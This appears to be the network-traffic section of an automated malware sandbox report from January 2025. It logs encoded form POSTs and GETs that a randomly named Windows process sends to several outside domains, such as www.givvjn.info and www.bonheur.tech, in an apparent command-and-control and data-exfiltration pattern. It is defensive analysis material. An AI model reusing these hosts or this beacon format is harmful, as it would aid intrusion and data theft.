                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 6a 74 71 31 6d 39 6a 77 6b 5a 32 6d 68 73 57 38 32 41 69 45 67 76 79 4d 38 4f 53 6f 67 42 4f 7a 67 61 6a 6f 74 63 77 5a 31 2b 53 48 5a 50 73 46 4e 57 4a 5a 30 37 4c 6c 7a 69 34 42 61 32 5a 4d 66 6b 37 55 58 33 4a 65 6b 62 30 72 4f 6b 49 65 56 6f 59 31 32 35 6a 6e 49 34 55 38 2f 61 2b 57 62 56 64 70 65 44 48 72 37 31 67 6e 72 47 6e 71 75 4c 34 41 33 5a 31 6e 74 59 62 76 4f 56 32 2b 56 74 66 33 38 38 57 2f 67 5a 64 2f 44 63 32 6f 47 35 66 4c 70 77 7a 32 59 62 62 77 67 37 39 44 2f 4f 44 2f 73 49 37 37 5a 37 55 32 42 4f 37 54 34 48 5a 74 41 75 43 38 61 74 54 50 68 6a 38 4b 38 47 56 4d 6d 55 74 72 42 44 7a 36 78 43 4f 52 4e 79 59 78 42 51 48 62 6f 47 69 79 2b 33 62 4a 48 79 50 45 55 50 45 72 4e 4a 57 46 59 35 33 5a 6f 51 4d 68 4d 63 54 77 6f 59 68 6f 76 69 54 49 35 38 32 61 55 34 43 51 36 37 53 53 31 76 64 73 58 53 74 52 76 2b 76 68 38 55 62 6c 71 6e 6f 76 32 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSjtq1m9jwkZ2mhsW82AiEgvyM8OSogBOzgajotcwZ1+SHZPsFNWJZ07Llzi4Ba2ZMfk7UX3Jekb0rOkIeVoY125jnI4U8/a+WbVdpeDHr71gnrGnquL4A3Z1ntYbvOV2+Vtf388W/gZd/Dc2oG5fLpwz2Ybbwg79D/OD/sI77Z7U2BO7T4HZtAuC8atTPhj8K8GVMmUtrBDz6xCORNyYxBQHboGiy+3bJHyPEUPErNJWFY53ZoQMhMcTwoYhoviTI582aU4CQ67SS1vdsXStRv+vh8Ublqnov25i2a05JwCCuayX5Tiv3Q9r0l2Fk9jAwMH1wZw7MU2xc22Q9Xoy62a9L7gbvjufuA9onDxUPyGflXzVBnC+4/TasnwSZGBNGoCy37jJpOZkCIQuGZCMDoKecPAkvMmOZj7oEIfj+U3iIJAITGmTg3kriOwwkDRkuKDeUzyxDHv6u5TkqIQkWiPtqB8GtCaX8ayvIk2j2WjKdpy+U+X3hfV4K3LZblCI2wnCdc24Y07fRW3+xG2g6IRWSCf+N0ifbV4QjMETcMjNAtEnGxuxZ/couwq84+S08yllM2dxP5zJEhXSJ6nKM3bqgFzB9yKX5Wp7L6u+vEl7lZprIcYbY+HuE8GqEwAiy40/X+djjFtvLcJcfKpcuixYlHFPwn8G2Gh7eYBkSPwrsRW5n7fEvq8akP2xwma/LBhahgevVwbCp/1IWFoBtTD2y630B2+0fpRwZB2ZHwjruH9Kc6+bqQnqqW9i0CFFbV5GIgY6VF186XPC/VviO4JPKeLtAakEyKtFyNlSfdorXtJC7tIGguxzTHXVXta0oYY54uIuzAaYa2axOJlmDLXOupbXS+8KM+jblMR6xqA+1leyw+Lhp3ZNn+cFFnkpisDYQyYm6yp/ZolbX31B/sRwEHD9FxPCxJGulJuq4hEcFVhEda0jAk7pqWJo7eXrhMWK [TRUNCATED]
                                                                                    Jan 9, 2025 16:54:40.359307051 CET1352OUTData Raw: 47 53 65 75 37 63 75 42 76 70 74 36 59 33 30 47 62 42 57 44 35 65 70 7a 63 4a 61 4f 53 71 78 35 62 71 71 46 6a 4a 4f 31 52 5a 33 61 2f 4a 2f 2f 78 68 78 39 41 58 6f 68 41 50 73 42 2f 6e 68 37 6c 51 6b 76 6e 55 72 43 30 59 6a 44 38 74 35 75 76 4a
                                                                                    Data Ascii: GSeu7cuBvpt6Y30GbBWD5epzcJaOSqx5bqqFjJO1RZ3a/J//xhx9AXohAPsB/nh7lQkvnUrC0YjD8t5uvJH+btWLlkM5T++pBUQ57tsNVA25ZzYgNS9RHwBLeXsMQCl1VLVt7rV7Ule2JzZukKpuKoTaiQijN4V6v5WrCsKUfUXnwhlGUX+vMWIlAoMw/PWjcHnvseFjA8OX1jj+yoW515+tok/RZwFLSS3I98ReNPwgY/iFRDm
                                                                                    Jan 9, 2025 16:54:40.553983927 CET918INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:40 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.11.3049835199.192.21.169805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:43.057981968 CET533OUTGET /qps0/?6B-l7F=oe/Nf5ZxPavzyNCN5fJJ2OrxgayHc7sFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2iuVOPOn5EuQA8dSwoA=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:54:43.248054981 CET933INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:43 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.11.304983747.83.1.90805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:57.128612995 CET796OUTPOST /nkmx/ HTTP/1.1
                                                                                    Host: www.givvjn.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.givvjn.info
                                                                                    Referer: http://www.givvjn.info/nkmx/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 44 71 4f 73 54 55 66 46 65 6a 79 37 35 43 77 54 35 41 39 45 73 5a 7a 53 70 32 59 68 49 71 6b 70 43 55 75 4c 76 33 65 2b 7a 61 6b 72 30 39 67 4f 34 35 49 72 4e 62 6c 48 6b 78 66 31 75 77 56 61 73 4c 45 58 52 49 4b 66 42 64 76 4b 59 63 72 47 37 7a 49 39 6d 44 55 49 76 4f 30 71 48 74 4c 38 45 6b 43 5a 56 77 4c 76 4f 4c 4c 2b 67 4f 50 51 37 44 6f 30 33 34 31 2b 6f 53 31 7a 31 78 6d 4d 75 57 47 42 77 4b 78 58 48 72 42 41 44 6f 65 50 6f 39 57 38 58 75 38 52 71 4d 57 38 71 2b 6b 69 51 37 4e 45 4b 71 36 34 51 64 75 31 2b 36 56 72 6e 63 57 42 4e 41 3d 3d
                                                                                    Data Ascii: 6B-l7F=TW4HYQMdIKn0DqOsTUfFejy75CwT5A9EsZzSp2YhIqkpCUuLv3e+zakr09gO45IrNblHkxf1uwVasLEXRIKfBdvKYcrG7zI9mDUIvO0qHtL8EkCZVwLvOLL+gOPQ7Do0341+oS1z1xmMuWGBwKxXHrBADoePo9W8Xu8RqMW8q+kiQ7NEKq64Qdu1+6VrncWBNA==
                                                                                    Jan 9, 2025 16:54:58.140507936 CET137INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:54:57 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.11.304983847.83.1.90805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:59.975334883 CET816OUTPOST /nkmx/ HTTP/1.1
                                                                                    Host: www.givvjn.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.givvjn.info
                                                                                    Referer: http://www.givvjn.info/nkmx/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 51 70 43 78 53 4c 75 31 32 2b 32 61 6b 72 38 64 67 50 6c 70 49 77 4e 62 59 6b 6b 31 58 31 75 77 78 61 73 4b 30 58 52 2f 2b 59 48 4e 76 49 55 38 72 45 2f 7a 49 39 6d 44 55 49 76 50 51 41 48 74 44 38 44 55 79 5a 58 53 7a 73 52 37 4c 68 6a 4f 50 51 74 7a 6f 77 33 34 31 63 6f 58 73 57 31 7a 4f 4d 75 54 69 42 78 59 4a 49 4f 72 42 4b 4d 49 66 4c 6b 34 7a 70 62 4e 77 6c 71 71 61 59 72 73 59 49 63 4d 67 65 58 70 4f 36 44 39 53 59 69 37 34 44 6c 65 58 61 51 45 59 46 46 41 4c 71 46 34 76 45 6d 7a 64 31 4c 4c 46 4e 32 68 55 3d
                                                                                    Data Ascii: 6B-l7F=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYQpCxSLu12+2akr8dgPlpIwNbYkk1X1uwxasK0XR/+YHNvIU8rE/zI9mDUIvPQAHtD8DUyZXSzsR7LhjOPQtzow341coXsW1zOMuTiBxYJIOrBKMIfLk4zpbNwlqqaYrsYIcMgeXpO6D9SYi74DleXaQEYFFALqF4vEmzd1LLFN2hU=
                                                                                    Jan 9, 2025 16:55:00.987040997 CET137INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:55:00 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.11.304983947.83.1.90805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:02.818437099 CET3933OUTPOST /nkmx/ HTTP/1.1
                                                                                    Host: www.givvjn.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.givvjn.info
                                                                                    Referer: http://www.givvjn.info/nkmx/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 49 70 43 44 4b 4c 76 55 32 2b 78 61 6b 72 39 64 67 53 6c 70 4a 79 4e 62 41 34 6b 31 54 4c 75 79 5a 61 6a 49 38 58 42 4f 2b 59 4f 4e 76 49 63 63 72 42 37 7a 49 6f 6d 44 45 4d 76 4f 67 41 48 74 44 38 44 58 71 5a 54 41 4c 73 4b 37 4c 2b 67 4f 50 6d 37 44 6f 59 33 38 67 72 6f 58 59 73 31 78 2b 4d 70 6b 4f 42 78 72 78 49 4f 72 42 4b 4c 49 66 77 6b 34 33 6f 62 4e 70 35 71 76 6a 76 6f 63 73 49 66 34 35 71 54 59 54 74 61 75 36 61 6d 49 73 35 7a 74 33 30 4e 47 68 6e 55 53 57 61 54 34 44 4c 75 44 4a 33 61 65 70 61 74 68 30 68 61 30 63 73 51 39 63 4e 42 62 35 74 4b 4f 69 5a 64 46 61 48 76 74 4a 78 67 42 48 4e 62 75 4e 64 65 6e 4e 47 47 4d 70 51 49 61 39 6a 4f 74 33 73 73 75 78 49 5a 63 38 51 67 62 68 53 63 31 66 72 31 56 53 63 45 59 74 56 47 74 46 59 34 42 45 76 4a 75 52 37 6c 33 44 74 4e 6a 48 37 72 63 2f 58 4e 7a 50 72 72 30 71 34 52 43 4a 42 48 68 42 66 64 34 79 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYIpCDKLvU2+xakr9dgSlpJyNbA4k1TLuyZajI8XBO+YONvIccrB7zIomDEMvOgAHtD8DXqZTALsK7L+gOPm7DoY38groXYs1x+MpkOBxrxIOrBKLIfwk43obNp5qvjvocsIf45qTYTtau6amIs5zt30NGhnUSWaT4DLuDJ3aepath0ha0csQ9cNBb5tKOiZdFaHvtJxgBHNbuNdenNGGMpQIa9jOt3ssuxIZc8QgbhSc1fr1VScEYtVGtFY4BEvJuR7l3DtNjH7rc/XNzPrr0q4RCJBHhBfd4yYvNOtjBTBdGsQtdgnMEL78hGmO563XCDuoJPI1ZWZHFZ3X+w2mGC2kbQsRPXaK7nA/z+QrK6gpC8u6PWPiaGfZj6PjNBWRV9J/N9uljrKOkpC/E1/2wNDCIbR9eBBvmQT2RpmyhZiHUeYs254QkMSMWQLO1NkXlOGTvFo2Wfn1KhXbnFJLGimT6MxlzdwwpcKKAJzZKZm0nrVkzz/C533VZQcL2uNUgwgHDOQqkWYjH0aZ0xljVTBrUwDCkimuuZhkgeVtPT007y//uzLpN2WZsP9bTBDN6ZQswmegC9iq/qqKpUFE4g8w5HGw3Rr/v/tYWf7yep2k9Sj4IDP4bRbDqwwBzDMGkOQYrLdlbem+4FumMTBCM7QDRcEtUcDSmDmv1uCs0G477TkxhMLkdoa6JB72O0VHVdq56EHW4YJZFp1ecQYu1xrmeGNdI3VExexlLQBoX51Ui+gEdaqY3qPSurIEP8VE64VbvFoP2oAPgiZag2seiilWmTORTLbWYZsiDrLSGrlInU1aSmf4SIPu82+Va05mstIVATDVl2jBLJUT10qP8dU1br4Nm/GdJtI4i6+X0sNdCz17dRMDT5yOrXI/LluX4jJ/dkry1bvx3mbVfs6lgV+pm9YuDxJPvuP8Rtz/w8ep/QzPk4J+3Z8kxcXc/bIbyje6 [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:03.815161943 CET137INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:55:03 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.11.304984047.83.1.90805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:05.659130096 CET534OUTGET /nkmx/?6B-l7F=eUQnbnMYY/LCOqGDejL9TQzNqDkA9lUjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth/8fPOW7Uk3kTT+8ArA=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.givvjn.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:55:06.653471947 CET139INHTTP/1.1 567 unknown
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:55:06 GMT
                                                                                    Content-Length: 17
                                                                                    Connection: close
                                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                                    Data Ascii: Request too large


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.11.304984113.248.169.48805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:13.006392002 CET799OUTPOST /t3iv/ HTTP/1.1
                                                                                    Host: www.bonheur.tech
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bonheur.tech
                                                                                    Referer: http://www.bonheur.tech/t3iv/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 43 33 66 61 59 6b 55 63 35 72 38 55 32 2b 44 57 51 41 42 74 51 2b 53 4c 35 56 7a 64 57 41 53 43 33 4a 36 67 50 47 48 4d 75 41 41 33 4a 68 2b 58 4f 30 36 52 4d 36 32 71 56 51 4b 2b 74 54 51 38 52 33 62 38 4e 76 77 43 33 7a 51 64 34 51 55 38 73 54 2b 66 78 2f 33 6c 35 2f 42 55 30 6d 41 78 32 56 70 4e 33 52 67 72 74 57 7a 4e 6b 44 45 4a 44 46 4d 74 7a 64 6e 30 63 6f 67 68 6c 73 4b 6d 66 6a 35 6a 67 4a 4a 67 67 4f 73 54 6b 48 44 47 79 41 51 4c 54 6b 75 39 38 31 43 66 65 74 45 50 75 4b 71 6c 49 49 70 66 70 4e 78 79 73 34 32 2b 6b 6c 78 77 74 78 73 71 57 30 44 67 30 4e 2b 33 48 77 3d 3d
                                                                                    Data Ascii: 6B-l7F=C3faYkUc5r8U2+DWQABtQ+SL5VzdWASC3J6gPGHMuAA3Jh+XO06RM62qVQK+tTQ8R3b8NvwC3zQd4QU8sT+fx/3l5/BU0mAx2VpN3RgrtWzNkDEJDFMtzdn0coghlsKmfj5jgJJggOsTkHDGyAQLTku981CfetEPuKqlIIpfpNxys42+klxwtxsqW0Dg0N+3Hw==
                                                                                    Jan 9, 2025 16:55:13.143280983 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.11.304984213.248.169.48805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:16.692215919 CET819OUTPOST /t3iv/ HTTP/1.1
                                                                                    Host: www.bonheur.tech
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bonheur.tech
                                                                                    Referer: http://www.bonheur.tech/t3iv/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 31 51 33 4a 46 36 58 63 42 61 52 4c 36 32 71 65 77 4b 37 69 7a 51 4e 52 33 58 72 4e 74 30 43 33 33 34 64 34 51 45 38 73 67 58 74 77 76 33 6e 67 50 42 53 37 47 41 78 32 56 70 4e 33 58 4e 4f 74 57 37 4e 6c 77 4d 4a 44 6b 4d 75 79 64 6e 31 66 6f 67 68 30 38 4b 69 66 6a 35 52 67 49 56 4f 67 4e 55 54 6b 47 7a 47 79 52 52 35 49 55 76 34 32 56 44 39 61 4f 35 41 6e 36 53 53 46 59 64 48 68 74 78 51 67 50 62 6b 35 6d 46 79 2b 52 51 48 4b 31 75 49 32 50 2f 73 61 2b 52 48 45 46 46 36 4d 46 59 6a 58 53 62 6b 4f 76 37 61 38 64 45 3d
                                                                                    Data Ascii: 6B-l7F=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct1Q3JF6XcBaRL62qewK7izQNR3XrNt0C334d4QE8sgXtwv3ngPBS7GAx2VpN3XNOtW7NlwMJDkMuydn1fogh08Kifj5RgIVOgNUTkGzGyRR5IUv42VD9aO5An6SSFYdHhtxQgPbk5mFy+RQHK1uI2P/sa+RHEFF6MFYjXSbkOv7a8dE=
                                                                                    Jan 9, 2025 16:55:16.828346014 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.11.304984313.248.169.48805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:55:19.366292000 CET3936OUTPOST /t3iv/ HTTP/1.1
                                                                                    Host: www.bonheur.tech
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bonheur.tech
                                                                                    Referer: http://www.bonheur.tech/t3iv/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
